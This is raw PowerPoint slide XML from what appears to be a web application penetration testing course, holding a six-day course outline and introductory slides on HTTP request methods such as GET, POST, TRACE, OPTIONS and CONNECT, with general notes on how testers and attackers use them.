            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340087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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Request Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="1767840"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web clients can use various request types when accessing a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These request types are referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>request methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, and include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TRACE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="440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0840" y="4099560"/>
            <a:ext cx="1998663"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4037" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="3810000"/>
            <a:ext cx="4572000" cy="1744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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> CONNECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> PUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> DELETE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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1448943"/>
            <a:ext cx="8153400" cy="5255514"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 1: Attacker's View, Pen-Testing and Scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 2: Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 3: Server-Side Vulnerability Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 4: Client-Side Vulnerability Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 5: Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 6: Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Right Arrow 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="219075" y="1371600"/>
            <a:ext cx="762000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>GET/POST/HEAD Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121920" y="1630680"/>
            <a:ext cx="8915400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>GET requests a web page, passing any parameters via the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Allows for bookmarks to save parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Could be dangerous for authentication-related and session-tracking parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easy manipulation by attackers and pen testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>POST also requests a web page, but passes any parameters via the HTTP payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Still able to be manipulated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Often can be changed to a GET for simpler scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the application supports method interchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Register_globals is one way this happens in PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HEAD only returns the HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Results of a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Speeds up testing if the tester is interested in header data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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TRACE/OPTIONS Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TRACE echoes the request as seen by the server back to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Allows the attacker to see any changes made by intermediate servers such as a proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Changes to the request may be made by inbound or outbound proxies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS asks the server which HTTP methods are supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easy method for determining which methods can be used for attacks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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>CONNECT Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1798320"/>
            <a:ext cx="4419600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>CONNECT creates an HTTP tunnel for requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Used to connect</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>through a proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can be useful in attacking other resources behind a proxy server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also used to establish SSL connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="4127500"/>
            <a:ext cx="1600200" cy="912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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>CONNECT method sets up tunnel between client and proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Can 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7848600" y="2057400"/>
            <a:ext cx="1066800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
